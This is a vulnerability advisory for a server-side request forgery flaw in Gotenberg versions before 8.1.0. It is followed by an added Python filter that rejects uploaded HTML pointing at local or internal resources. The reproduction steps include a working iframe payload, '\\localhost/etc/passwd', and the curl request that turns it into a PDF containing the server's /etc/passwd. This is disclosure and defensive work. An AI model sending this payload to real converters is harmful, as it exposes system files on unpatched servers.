Affected versions of github.com/gotenberg/gotenberg (<8.1.0) are vulnerable to Server-side Request Forgery (SSRF) via the /convert/html endpoint when a request is made to a file via localhost, such as <iframe src="\\localhost/etc/passwd">.
- Start Gotenberg:
  $ docker run --rm -p 3000:3000 gotenberg/gotenberg:8.0.3 gotenberg
- Create an index.html file with the following contents:
  <html>
  <head></head>
  <body>
  <iframe src="\\localhost/etc/passwd"></iframe>
  </body>
  </html>
- Convert index.html to PDF:
  $ curl -v \
    --request POST 'http://localhost:3000/forms/chromium/convert/html' \
    --form 'files=@"index.html"' -o output.pdf
- Open output.pdf; it will include the contents of /etc/passwd.
The issue has been fixed in version 8.1.0 with this commit.
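As an added example (not part of this advisory or of the Gotenberg project), the following Python pre-conversion check scans an uploaded HTML document for resource references that would make the converter's browser read a local file or contact a loopback/internal host, including the advisory's backslash form, which browsers normalise to a network-path reference with host localhost. The sample upload and the gateway placement are assumptions; the check is a defence-in-depth filter for deployments that cannot upgrade immediately, not a replacement for the fixed version.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Attributes whose value the rendering browser fetches as a sub-resource.
URL_ATTRS = {"src", "href", "data", "action", "poster"}

def is_local_or_internal(ref: str) -> bool:
    # Browsers treat backslashes as slashes in http(s)/file URLs, so the advisory's
    # "\\localhost/etc/passwd" is "//localhost/etc/passwd": host "localhost".
    parts = urlsplit(ref.strip().replace("\\", "/"))
    if parts.scheme.lower() == "file":
        return True
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False  # relative reference: resolved against the uploaded files
    if host == "localhost" or host.endswith(".localhost"):
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # public hostname; DNS-based checks are out of scope here
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_unspecified

class ResourceRefScanner(HTMLParser):
    """Collects (tag, attribute, value) for every resource reference seen."""
    def __init__(self) -> None:
        super().__init__()
        self.refs = []
    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.lower() in URL_ATTRS and value:
                self.refs.append((tag, name.lower(), value))

def find_local_refs(html: str) -> list:
    """Return the references a gateway should reject before calling the converter."""
    scanner = ResourceRefScanner()
    scanner.feed(html)
    scanner.close()
    return [r for r in scanner.refs if is_local_or_internal(r[2])]

# Constructed sample upload: the advisory's payload, a file: URL, and two benign refs.
SAMPLE_HTML = r"""<html><body>
<iframe src="\\localhost/etc/passwd"></iframe>
<link rel="stylesheet" href="file:///etc/hostname">
<img src="https://example.com/logo.png">
<img src="logo.png">
</body></html>"""

if __name__ == "__main__":
    for tag, attr, value in find_local_refs(SAMPLE_HTML):
        print(f"reject upload: <{tag} {attr}={value!r}> targets a local resource")
```

Running it on the sample rejects the iframe and the stylesheet link while leaving the external image and the relative reference alone.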